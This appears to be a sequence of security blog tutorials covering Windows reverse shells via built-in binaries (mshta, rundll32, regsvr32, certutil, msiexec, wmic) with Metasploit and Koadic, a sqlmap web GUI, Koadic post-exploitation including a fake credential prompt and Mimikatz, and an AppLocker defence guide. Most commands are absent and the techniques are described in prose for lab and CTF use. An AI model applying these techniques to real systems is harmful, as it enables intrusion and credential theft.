Get Reverse-shell via Windows one-liner

This article will help those who play with CTF challenges, because today we will discuss “Windows One- Liner” to use malicious commands such as power shell or rundll32 to get reverse shell of the Windows system. Generally, while abusing HTTP services or other programs, we get RCE vulnerability. This loophole allows you to remotely execute any system command. We have therefore prepared a list of Windows commands that enable you to use the target machine to get reverse connections.

Table of Content

Mshta.exe

  • Launch HTA attack via HTA Web Server of Metasploit

Rundll32.exe

  • Launch Rundll32 Attack via SMB Delivery of Metasploit

Regsvr32.exe

  • Launch Regsvr32 via Script Web Delivery of Metasploit

Certutil.exe

  • Launch MSbuild Attack via Msfvenom C# shellcode

Powershell.exe

  • Launch Powercat attack via Powershell
  • Launch cscript.exe via Powershell
  • Launch Batch File Attack via Powershell

Msiexec.exe

  • Launch msiexec attack via msfvenom

Wmic.exe

  • Launch Wmic.exe attack via Koadic

Mshta.exe

Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA( HTML Application) files. HTML files that we can run JavaScript or Visual with. You can interpret these files using the Microsoft MSHTA.exe tool.

Metasploit contain “HTA Web Server” module which generate malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed.

Now run the malicious code through mshta.exe on the victim’s machine (vulnerable to RCE) to obtain meterpreter sessions.

Once you will execute the malicious hta file on the remote machine with the help of mshta.exe, you get reverse connection at your local machine (Kali Linux).

As you can observe that, we have meterpreter session of the victim as shown below:

Rundll32.exe

Rundll32.exe is associated with Windows Operating System that allow you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.

Launch Rundll32 Attack via SMB Delivery of Metasploit

Metasploit also contain “SMB Delivery” module which generate malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.

Now run the malicious code through rundll32.exe on the victim machine (vulnerable to RCE) to obtain meterpreter sessions.

Once you will execute the dll file on remote machine with the help of rundll32.exe, you will get reverse connection at your local machine (Kali Linux).

As you can observe that, we have meterpreter session of the victim as shown below:

Regsvr32.exe

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry. Regsvr32.exe is installed in the %systemroot%\System32 folder in Windows XP and later versions of Windows.

RegSvr32.exe has the following command-line options:

Syntax: Regsvr32 [/s][/u] [/n] [/i[:cmdline]] <dllname>

/u – Unregister server
/i – Call DllInstall passing it an optional [cmdline]; when it is used with /u, it calls dll uninstall
/n – do not call DllRegisterServer; this option must be used with /i
/s – Silent; display no message boxes

Launch Regsvr32 via Script Web Delivery of Metasploit

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection.

Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

Copy the highlighted text shown in below window

Once you will execute the scrobj.dll file on remote machine with the help of regsrv32.exe, you will get reverse connection at your local machine (Kali Linux).

As you can observe that, we have meterpreter session of the victim as shown below:

Certutil.exe

Certutil.exe is a command-line program that is installed as part of Certificate Services. We can use this tool to execute our malicious exe file in the target machine to get meterpreter session.

Launch certutil Attack via Msfvenom

Generate a malicious executable (.exe) file with msfvenom and start multi/handler to get reverser shell of victim’s machine.

 

Now, in order to dump configuration information or files of shell.exe file with certutil, you can follow below systax:

Syntax: [-f] [-urlcache] [-split] Path of executable file

As you can observe that, we have meterpreter session of the victim as shown below:

Powershell.exe

You can use PowerShell.exe to start a PowerShell session from the command line of another tool, such as Cmd.exe, or use it at the PowerShell command line to start a new session. Read more from official website of Microsoft Windows from here.

Launch Powercat attack via Powershell

Powercat is a PowerShell native backdoor listener and reverse shell also known as modify version of netcat because it has integrated support for the generation of encoded payloads, which msfvenom would do and also has a client- to- client relay, a term for Powercat client that allows two separate listeners to be connected.

Download powershell in your local machine and then the powercat.ps1 transfer files with python http server to obtain reverse shell of the target as shown below and start netcat listener.

Then execute following command on remote side to get natcat session.

As you can observe that, we have netcat session of the victim as shown below:

Batch File

Similarly, powershell allows client to execute bat file, therefore let’s generate malicious bat file with msfvenom as given below and start netcat listener.

Then execute following command on remote side to get natcat session.

As you can observe that, we have netcat session of the victim as shown below:

Cscript

Similarly, powershell allows client to execute cscript.exe to run wsf, js and vbs script, therefore let’s generate malicious bat file with msfvenom as given below and start multi/handler as listener.

Then execute following command on remote side to get meterpreter session.

As you can observe that, we have meterpreter session of the victim as shown below:

Msiexec.exe

As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. The executable program that interprets packages and installs products is Msiexec.exe.  

Launch msiexec attack via msfvenom

Let’s generate a MSI Package file (1.msi) utilizing the Windows Meterpreter payload as follows and start multi/handler as listener.

Once you will execute the 1.msi file on remote machine with the help of msiexec, you will get reverse connection at your local machine (Kali Linux).

As you can observe that, we have meterpreter session of the victim as shown below:

Wmic.exe

The WMIC utility is a Microsoft tool provides a WMI command-line interface that is used for a variety of administrative functions for local and remote machine and also used to wmic query such as system settings, stop processes and execute scripts locally or remotely. Therefore, it can invoke XSL script (eXtensible Stylesheet Language).

Launch Wmic.exe attack via Koadic

Now will generate a malicious XSL file with the help of koadic which is a Command & Control tool which is quite similar to Metasploit and Powershell Empire.

To know how koadic works, read our article from here: https://www.hackingarticles.in/koadic-com-command-control-framework/

Once installation gets completed, you can run ./koadic file to start koadic and start with loading the sta/js/wmic stager by running the following command and set SRVHOST where the stager should call home.

Execute WMIC following command to download and run the malicious XSL file from a remote server:

Once the malicious XSL file will get executed on target machine, you will have a Zombie connection just like metasploit.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Configure Sqlmap for WEB-GUI in Kali Linux

Hello everyone and welcome to this tutorial of setting up SQLMAP for web-gui. Web-GUI simply refers to the interface that a browser provides you over the http/https service.

SQLMAP is a popular tool for performing SQL injection attacks on sites affected by mysql errors; be it an error based sql injection or hidden sql, sqlmap is the biggest tool there is for SQL injection attacks. But very few people know that sqlmap also provides an API for it’s service that is written in python that we can use to develop a front end for the same sqlmap which is on command line interface.

One such person is Hood3dRob1n(https://github.com/Hood3dRob1n/SQLMAP-Web-GUI) who has created a PHP based front end for sqlmap and today, we’ll be setting it up in Kali Linux. It is needless to say, it will be compatible with any Linux distro.

Let’s get started.

Table of Contents:

  1. Cloning the github repository and giving necessary permissions
  2. Locating and hosting the API
  3. Launching the front end
  4. Attacking practice lab for SQLi

Cloning the github repository

First, we need to clone the Hood3dRob1n repository. To clone, we’ll use the git clone command and put the folder named sqlmap inside “/var/www/html.”

 

Locating and hosting the API

The next step is to host an apache server. If you don’t have apache pre installed, you can install it with apt-get install apache2 command.

After we have hosted the Apache server, we need to run the sqlmapapi.

The default folder would vary with multiple linux distros, so we used the locate command to locate the file named “sqlmapapi.py

We need to run this API using the command:

Launching the front end

If you have followed this tutorial so far, you’ll see the following screen when you open localhost/sqlmap

And voila! Just like that you are good to start injecting SQL queries.

Attacking practice lab for SQLi

There are 6 tabs essentially here.

  • BASIC: This tab allows you to set the URL to test SQL injections. You can set HTTP method too. Given options are POST, PUT, HEAD etc.
  • REQUEST: Allows you to modify your request with optional parameters like time delay, timeout between requests, no. of retries to connect, user agent etc.
  • INJECTION & TECHNIQUE: Lets you choose which kind of injection and techniques you are applying– Boolean based, error based, inline etc. as well as other options like use of DBMS hex functions for data retrieval, kind of database (MYSQL or MSSQL) and so on.
  • DETECTION: To set a custom string to match.
  • ENUMERATION: What data to retrieve. Eg: current user and current database dump. Or if you are feeling fancy, all users all data dump. You can play around with it.
  • ACCESS: Access parameters. Leave this at default if you don’t know your way around it.

We will set the parameters one by one as we proceed. But we never attack on live websites, hence, we used another PC with an IP address of 192.168.1.105 to host a practice lab for SQL injection attacks called SQL-Dhakkan. Refer to this article to know how you can set it up yourself!

If you are successful to set up the lab, you’ll get a screen something like this:

I am on Lesson 1 currently and I know that id=1 has an error based SQLi vulnerability. So, let’s copy this URL to our web-gui sqlmap.

It is highly recommended that you get yourself familiar with HTTP methods and read how to manually attack SQLi here because it will give you a profound idea of the options we will be selecting further in the tutorial. But if you wish to continue with the tutorial instead, who am I to stop you!

Go to the enumeration tab and select the methods that you want to test.

Once set, set the type of SQLi you want to perform.

Once you are satisfied with the choices you input, run the scan!

For the purpose of this tutorial we have performed a really basic scan that tells us the current database and hostname, but you can play around with the parameters as you like.

Conclusion: Web based GUI for sqlmap is definitely a plus point over the traditional sqlmap for many reasons, one of them being the ease of access. There is no need to remember such long commands. Drag, drop and done!

Plus, web-based GUI is nothing but a web app for you. A web app that runs sqlmap, isn’t it great?

Hope you enjoyed this little tutorial.

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

Koadic – COM Command & Control Framework

Hello friends!! In this article we are introducing another most interesting tool “KOADIC – COM Command & Control” tool which is quite similar to Metasploit and Powershell Empire. So let’s began with its tutorial and check its functionality.

Table of Content

  • Introduction to Koadic
  • Installation of Koadic
  • Usage of Koaidc
  • Koadic Stagers
  • Privilege Escalation with Koadic Implants
  • Post Exploitation
    • Generate Fake Login Prompt
    • Enable Rdesktop
    • Inject Mimikatz
    • Execute Command
    • Obtain Meterprter Session from Zombie Session

Introduction to Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3. However, as Python 2 will be going out the door in the not-too-distant future, we recommend using Python 3 for the best experience.

Source – https://github.com/zerosum0x0/koadic

Installation of Koadic

It must first be downloaded and installed in order to start using Koadic. Run following command to download Koadic from github and also take care of its dependency tools while installing koadic.

git clone https://github.com/zerosum0x0/koadic.git

cd koadic

Usage of Koaidc

This tool is majorly depends upon stager and implant. It contains 6 stager and 41 implant

Stager: Stagers hook target zombies and allow you to use implants.

Implants: Implants start jobs on zombies.

Once installation gets completed, you can run ./koadic file to start koadic. Then run the most helpful command to get synopsis of the use of koadic is help. The help command summarizes the various commands available. Koadic functions similar to other frameworks, such as Metasploit.

To load all available module in the terminal run “use <tab> <tab>” command. This will dump all available implant and stagers for execution or explore stager module with following commands:

This will give you all stagers that will be useful for getting zombie session of target machine.

Koadic Stagers

The stager enables us to describe where any zombie device accesses the Koadic command and control. Some of these settings can be viewed by running info command once the module is selected. Let’s start with loading the mshta stager by running the following command.

Set SRVHOST where the stager should call home and SRVPORT the port to listen for stagers on or even you can set ENDPOINT for malicious file name and then enter run to execute.

Now wit for the victim to run below command to execute above generated malicious file.

Once the malicious sales file will get executed on target machine, you will have a Zombie connection just like metasploit.

Privilege Escalation with Koadic Implants

Once you have zombie session after than you can use implant modules for privilege escalation that includes bypassuac.

Koadic contains all modules to bypassuac of Windows 7, 8, 10 platform, so that you can extract system level information. We can load this module by running the command below within Koadic.

Then, we will set the payload value to run the module. You can use default zombie value as “ALL” to attack all zombies or can set the particular zombie id you want to attack. Use the command below to adjust the payload value and zombie.

Post Exploitation

Generate Fake Login Prompt

You can start a phishing attack with koadic and track the victim’s login credentials. We can load this module by running the command below within Koadic.

This will launch a Prompt screen for login at victim’s machine.

Therefore, if the victim enters his password in a fake prompt, you get the password in the command and control of Koadic.

Enable Rdesktop

Just like metasploit, here also you can enable remote desktop service in the victim’s machine with the following implant module.

As you can observe in the below image that job 4 is completed successfully and it has enabled rdesktop service.

We can ensure for rdesktop service with the help of nmap to identify state of port 3389.

Hmm!! So you can observe from nmap result we found port 3389 is open which means rdesktop service is enable.

Inject Mimikatz

It will let you inject mimkatz in victim’s machine for extracting password from inside the machine. We can load this module by running the command below within Koadic.

As result, it will dump the NTLM hash password which we need to crack. Save the NTLM value in a text file.

Then we will use john the ripper for cracking hash value, therefore run following command along with the hash file as shown below:

As you can observe that it has shown 123 as the password extracted from the hash file.

Execute Command

Since we high privileged shell therefore we are free to run any implant module for Post exploitation therefore now we are using exec_cmd to execute any command on the Windows system. To load this implant, run the command given below.

Then, we will set the CMD value to run the specify command along with Zombie id.

Obtain Meterprter Session from Zombie Session

If you are having zombie session then you can get meterpreter session through it. Generate a malicious file with the help of msfvenom and start multi handle, as we always do in metasploit.

Koadic provides an implant module that allows you to upload any file to the machine of the victim if you have zombie sessions. To load this implant, run the following command:

Now set the file location and Zombie Id then run the module. This will upload your malicious in writable directory i.e. %TEMP% .

 

Once the job is completed then again use exec_cmd to run the uploaded file with the help of this module.

Then, we will set the CMD value to run the uploaded shell.exe file along with Zombie id.

Once you will execute the malicious exe file within Koadic zombie session, you will get a meterpreter session in the metasploit framework as shown below:

Once the file is executed on the machine we will get the victim machine meterpreter session as show below:

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Windows Applocker Policy – A Beginner’s Guide

Hello Friends!! This article is based on “Microsoft Windows – Applocker Policy” and this topic for System Administrator, defines the AppLocker rules for your application control policies and how to work with them.

Table of Content

Introduction to Applocker

  • What is applocker Policy?
  • Who Should Use AppLocker?
  • What can your rules be based upon?

Configure the Applocker to Allow/Deny Execution of an App

  • Configure Enforcement rule
  • Create Default Rules

Modify Executable Default Rules to Allow an App

  • Rule conditions
    • Publisher
    • Path
    • File Hash

Modify Windows Installer Default Rules to Allow an App

Modify Script Default Rules to Allow an App

Creating New Rules to Block an APP

Introduction to Applocker

What is applocker Policy?

Windows applocker is a function that was introduced in home windows 7 and windows server 2008 r2 as a method to restrict the usage of unwanted Programs. Windows AppLocker lets administrators to control which executable files are denied or allowed to be run. With this policy, administrators are able to generate rules based on file names, publishers or file location on unique identities of files and to specify which users or groups can execute those applications.

What can your rules be based upon?

The AppLocker console is ordered into rule collections, those are executable files, scripts, Windows Installer files, packaged apps and packaged app installers, and DLL files. These collections allow you to easily distinguish the rules for different application types. The following table lists the file formats that are included in each rule collection.

Who Should Use AppLocker?

AppLocker is a worthy for organizations which have to accomplish any of the following jobs:

  • Check which applications are allowed to run inside the company.
  • check which users are allowed to run licensed program.
  • offer an audit log of what program customers were running.
  • prevent trendy users from installing software per user.

Configure the Applocker to Allow/Deny Execution of an App

In the Group Policy Object Editor at Computer Configuration > Windows Settings > Security Settings > Application Control Policies > AppLocker, the Windows AppLocker settings exist.

Configure Enforcement Rule

Use the enforcement setting for each collection to configure to Enforce rules, rules are enforced for the rule collection and all events are audited.

  1. Select the Configured check box for the rule collection that you are editing, and then verify that Enforce rules is selected.
  2. Click OK.

Open Advance tab and enable the DLL rule collection.

Create Default Rules

AppLocker includes default rules for each rule collection. These rules are intended to help ensure that the files that are required for Windows to operate properly are allowed in an AppLocker rule collection.

  • Open the AppLocker console.
  • Right- click the appropriate rule type for which you want to generate default rules automatically. You can automatically create executable rules, Windows Installer rules, script rules, and packaged application rules.
  • Click Create Default Rules.

Executable Default Rule Types Include:

  • Allow members of the local Administrators group to run all apps.
  • Allow members of the Everyone group to run apps that are located in the Windows folder.
  • Allow members of the Everyone group to run apps that are located in the Program Files folder.

Modify Executable Default Rules to Allow an App

A rule can be configured to use allow or deny actions:

  • ALLOW : You can specify which files are allowed to run in your environment, and for which users or groups of users.
  • DENY : You can specify which files are not allowed to run in your environment, and for which users or groups of users.

Once you have configured default rules as done above, then you can modify it as per your requirement. For example if you want to modify rule :“Allow members of the Everyone group to run apps that are located in the Program Files folder” for specific user or group to allow a specific program file execution, then go its property by making right click on that rule and follow below steps.

Select the file or folder path that this rule should affect. The asterisk (*) can be used as a wildcard in the rules of the path. For example, %ProgramFiles% \* indicates that all files and subfolders within that path.

Rule conditions

Conditions of rules are criteria for AppLocker to identify the applications to which the rule applies. The three main rules are publisher, path and hash of the file.

Publisher

Identifies a digital signature- based application. The digital signature encloses information about the company (the publisher) who created the application.

Wildcard characters can be used as values in the publisher rule fields according to the following specifications:

Advantage:

Frequent updating is not required.

You can apply different values within a certificate.

You can use a single rule to allow a complete product suite.

Within the publisher rule, you can use the asterisk (*) wildcard character to specify that any value should match.

Disadvantage:

While a single rule can be used to allow a complete product suite, all files in the suite must be uniformly signed.

Path

Identify an app in the computer file system or on the network by its location. For well-known paths such as Program Files and Windows, AppLocker uses custom path variables.

Advantages:

Many folders or a single file can be easily controlled.

The asterisk (*) can be used as a wildcard in the rules of the path. For example, %ProgramFiles%\Microsoft Office\* indicates that all files and subfolders within the Microsoft Office folder will be affected by the rule.

Disadvantage:

It could be at risk if a rule that is organized to use a folder path holds subfolders that are writable by local user.

File Hash

Represents the calculated cryptographic hash system of the identified file. For non-digitally signed files, file hash rules are safer than path rules.

Advantage:

Since each file has a unique hash, a file hash condition only applies to one file.

Disadvantage:

Whenever the file is updated (such as security updates or upgrades), the hash of the file changes. Consequently, you have to manually update the rules for file hash.

Modify Windows Installer Default Rules to Allow an App

Windows Installer Default Rule Types Include:

  • Allow members of the local Administrators group to run all Windows Installer files.
  • Allow members of the Everyone group to run all digitally signed Windows Installer files.
  • Allow members of the Everyone group to run all Windows Installer files that are located in the Windows\Installer folder.

Similarly if you want to modify Windows Install default rules, then repeat above steps.

Wildcard characters can be used as values in the publisher rule fields according to the following specifications:

Publisher: The asterisk (*) character used by itself represents any publisher.

Product name: The asterisk (*) character used by itself represents any product name.

File name: Either the asterisk (*) or question mark (?) characters used by themselves represent any and all file names.

File version: The asterisk (*) character used by itself represents any file version. If you want to limit the file version to a specific version or as a starting point, you can state the file version and then use the following options to apply limits:

  • Exactly. The rule applies only to this version of the app
  • And above. The rule applies to this version and all later versions.
  • And Below. The rule applies to this version and all earlier versions.

Open Exceptions and then again select Publisher.

Modify Script Default Rules to Allow an App

Script Default Rule Types Include:

  • Allow members of the local Administrators group to run all scripts.
  • Allow members of the Everyone group to run scripts that are located in the Program Files folder.
  • Allow members of the Everyone group to run scripts that are located in the Windows folder.

Similarly if you want to modify Script default rules, then repeat above steps.

Select the file or folder path that this rule should affect.

Open Exceptions and then again select Publisher.

 

In this way, you can implement Default rules and modify them for Executable file, Script rules or Windows Installer files according to your situation.

Creating New Rules to Block an APP

If you want to make your own rule in order to allow or deny action for any application, you can choose the options ” Create New Rule” below. Let’s say, I want to create a new Executable file rule to restrict command prompt execution for everyone.

Then, you will get a wizard that helps you to create an Applocker rule, which will truly based on file attribute such as the file path and digital signature.

NOTE: Install the applications you want to create the rules for on this computer.

Now the action to use  and the user or group that this rule should apply to. A deny action prevent affected file from running.

Select the type of primary condition that you  would like to create. Here we have chose “Publisher” options.

Browse for a signed file to use as a reference for the rule. Here we have browse the cmd.exe and then click on next.

Choose the Publisher as exception and then click Next.

And finally, this will add your rule to restrict the cmd.exe.

Set Application identity to Automatic mode:

Then navigate to “Application identity Property” through Computer Configuration > Policies > Windows Settings > Security Settings > System Services > Application identity.

Then enable “Automatic” option as the service startup mode.

Now update the Group policy with the help of gpupdate command.

Now when you will try to open command prompt “cmd.exe” then you will get services restriction prompt as shown.

Note: If you are configuring these rule on single machine then it will take some time to impose the rule over machine.

Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/working-with-applocker-rules

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here